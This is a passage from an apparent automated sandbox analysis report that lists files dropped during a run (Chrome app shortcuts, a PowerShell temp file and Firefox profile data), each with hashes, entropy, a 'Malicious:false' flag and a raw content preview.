                                                                                                                                                                                                                                                                                                                                                      Preview:...................................FL..................F. .. ......{4....C'.f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4.......f..%.'.f......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Z................................A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......FW.H.Z.............................:U.R.o.a.m.i.n.g.....\.1......Z....MICROS~1..D......FW.H.Z.............................\..M.i.c.r.o.s.o.f.t.....V.1.....GX3w..Windows.@......FW.H.Z..............................K.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Z......................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Z....Programs..j......FW.H.Z......................@......f..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Z......Q...........

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEDN6VSQ16K2WT82Y8E8.temp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5440
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9297324647367264
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:uO518dpg8MwCVU272pukvjwortKGia7DSogZowNKGia7DSogZoJG1:P8nMwCaIrkvMCKGibHXKGibHk4
                                                                                                                                                                                                                                                                                                                                                      MD5:9265FB37DA923227C0E5C510774AF4AD
                                                                                                                                                                                                                                                                                                                                                      SHA1:884DB23CBF8FE88141284D9907CD695B1C326F6B
                                                                                                                                                                                                                                                                                                                                                      SHA-256:959F4AF3D0CBBE9AA0E85A2FA428D25436C05B155546FE2CDB292BDF27CE6E45
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D0DDE7E8D419B36093A5CDA7843BAEDF2471675660232B9C5E83A101674E93EF6502F2659A711A4053BF078F5AFE6430807EAC270C41F3A5AD6743189594EDC3
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:...................................FL..................F. .. ......{4....C'.f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4.......f..%.'.f......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Z................................A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......FW.H.Z.............................:U.R.o.a.m.i.n.g.....\.1......Z....MICROS~1..D......FW.H.Z.............................\..M.i.c.r.o.s.o.f.t.....V.1.....GX3w..Windows.@......FW.H.Z..............................K.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Z......................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Z....Programs..j......FW.H.Z......................@......f..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Z......Q...........

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.982301821577703
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8/nmdjTMnjinHbidAKZdA1FehwiZUklqehNy+3:8/n6Silqy
                                                                                                                                                                                                                                                                                                                                                      MD5:9F2A1D1BABE5339C84259DA36D7E00A9
                                                                                                                                                                                                                                                                                                                                                      SHA1:A9A3DF77BD40DA29F0330E2A731F07E202F29C74
                                                                                                                                                                                                                                                                                                                                                      SHA-256:50CB40FBF89A772F5447CDD65F560FB3E788CDE7EEFC906143424CE73738DF58
                                                                                                                                                                                                                                                                                                                                                      SHA-512:9A9ED063DDFDFC37760E850D75DDE5814BA1F78F0E7453E0ED2446370FE66E036771F1FFF5DD7741E64E63C15CE4EDC6799EBB87341B5D716976F2FE49235D99
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....4L.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.000357319150815
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:82djTMnjinHbidAKZdA1seh/iZUkAQkqehay+2:8KSi79QDy
                                                                                                                                                                                                                                                                                                                                                      MD5:5DDA823095E737A57B3DBF884B09F994
                                                                                                                                                                                                                                                                                                                                                      SHA1:45D87D53BEE91AB0066C44BD6F3102497B2B27CA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D4003398373D1F18100AD9410A2FE9DDE94586F6800E1A5563FC0FAB8F2CC106
                                                                                                                                                                                                                                                                                                                                                      SHA-512:01CADF3889F8A20E022D47EA4DDFFA0881693027AFA06BD7663F4D1B62CCE376968894ECE0C7982C714DCFB61716985F1FD551E72640D9261E6363F42AF38FBB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......6.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.008667920969143
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8OdjTMnjAHbidAKZdA14meh7sFiZUkmgqeh7sQy+BX:8iSGnuy
                                                                                                                                                                                                                                                                                                                                                      MD5:14795973F39AB219C87D2EB53CB60DDB
                                                                                                                                                                                                                                                                                                                                                      SHA1:2D38C21219EC56231C19164067730AF6930E7105
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B912C5C67AD6C854D33714574EF66F6D3B2C43CCE60E37237A3FE9EE87E7B5B5
                                                                                                                                                                                                                                                                                                                                                      SHA-512:50A37318C6A6196E972E1A5DCAD477EED7C11B0FB16EC0B1BCA80F8478FAFDEFBCF156B88583D6635F60BD03EF76B2DC4164FA4FD611C67815508B00FC46470E
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.999283071118521
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8H7djTMnjinHbidAKZdA1TehDiZUkwqehWy+R:8HlSioYy
                                                                                                                                                                                                                                                                                                                                                      MD5:5666782821E0E601178AC5FA43B0B81B
                                                                                                                                                                                                                                                                                                                                                      SHA1:BA27EFB52AF8DA006DB56D67C369384A45AD9FD2
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3EC83179F7DEDB946F34AF1435C2F399B751570E0726C81F71DBDC095CA7281E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F8038AA46A4D0F200AE8BB5EA40246A11A7C0EED0DA6ABA7FB97E460B7BC0A452938E39B56831B3ADA5E98ED37F308451F855A7E3B79B2CC089561E2F0D585D1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......&.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9873559385057593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:80djTMnjinHbidAKZdA1dehBiZUk1W1qehky+C:8sSiY9Ey
                                                                                                                                                                                                                                                                                                                                                      MD5:EB3C58C54EFD4B61B0B846A093415801
                                                                                                                                                                                                                                                                                                                                                      SHA1:C2FD2184FF585CC0450DA4EDEFCFE8707494FEC1
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F854FF525DCA084F7B62A81EBD18182FAECCE60024F5C18058BE8553089224F7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C585E27CC364318D22659FA8473D40F5245A18D0087BA5A4708607485EA3A9BFB65A01D1442A6660206AA2D7C622F043E0F82C135B75FFE881997A45D216075A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......?.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9977048374668267
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8JdjTMnjinHbidAKZdA1duTeehOuTbbiZUk5OjqehOuTbuy+yT+:8vSiqTfTbxWOvTbuy7T
                                                                                                                                                                                                                                                                                                                                                      MD5:BF10447F74B757445EFCC42C265352F6
                                                                                                                                                                                                                                                                                                                                                      SHA1:1AD9BB54C4B26F2B37B2BE5BBC1D04DAADD3A9F7
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B7FD18B96B9AC87BE73E6A7E929987AA7C9D0174E2DDEB95957A5953305F6AAD
                                                                                                                                                                                                                                                                                                                                                      SHA-512:729A0A75C0C83A11E9AA774FA79DEFDEE8ED5B0BF721121540194145A47F4755B10E05B3C5168E8E6E908C1B3A0B7321FB085E0825F357C76C3AEB94687E0293
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....U...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\ExperimentStoreData.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3621
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.929680976946779
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YnSwkmrOIfPUFuOdwNIOdoWLEWLtkDB/u4x5FBvipA6kbSathfkLuhakNzN9vXxE:8S+OIfPUFuOdwNIOd8jvYR0uL21X8P
                                                                                                                                                                                                                                                                                                                                                      MD5:3636E4E8BD0E43F071FE046B1BB65EFF
                                                                                                                                                                                                                                                                                                                                                      SHA1:27EF15AFE44BA736155FDBDA77D03978ED777469
                                                                                                                                                                                                                                                                                                                                                      SHA-256:545B8D72E60CB603C5588B090BDD24043936EAB96E1A564E29CB30540208BE78
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A520AE7152121CC4C55F32575CC8C56B623E992DC2D7870EE81E966528EA2FA4FD13E1BFD951CB3BD1DFD9F4BFFA7D1B497393BDBA59243C2448B2AB345A4A05
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"9c4f630b-d3dc-4236-9fe2-a1415309e4e4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-06T09:08:30.452Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\ExperimentStoreData.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3621
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.929680976946779
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YnSwkmrOIfPUFuOdwNIOdoWLEWLtkDB/u4x5FBvipA6kbSathfkLuhakNzN9vXxE:8S+OIfPUFuOdwNIOd8jvYR0uL21X8P
                                                                                                                                                                                                                                                                                                                                                      MD5:3636E4E8BD0E43F071FE046B1BB65EFF
                                                                                                                                                                                                                                                                                                                                                      SHA1:27EF15AFE44BA736155FDBDA77D03978ED777469
                                                                                                                                                                                                                                                                                                                                                      SHA-256:545B8D72E60CB603C5588B090BDD24043936EAB96E1A564E29CB30540208BE78
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A520AE7152121CC4C55F32575CC8C56B623E992DC2D7870EE81E966528EA2FA4FD13E1BFD951CB3BD1DFD9F4BFFA7D1B497393BDBA59243C2448B2AB345A4A05
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"9c4f630b-d3dc-4236-9fe2-a1415309e4e4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-06T09:08:30.452Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\addonStartup.json.lz4 (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 23432 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5312
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.615424734763731
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrw2D:VTx2x2t0FDJ4NpwZMd0EJws
                                                                                                                                                                                                                                                                                                                                                      MD5:1B9C8056D3619CE5A8C59B0C09873F17
                                                                                                                                                                                                                                                                                                                                                      SHA1:1015C630E1937AA63F6AB31743782ECB5D78CCD8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\addonStartup.json.lz4.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 23432 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5312
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.615424734763731
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
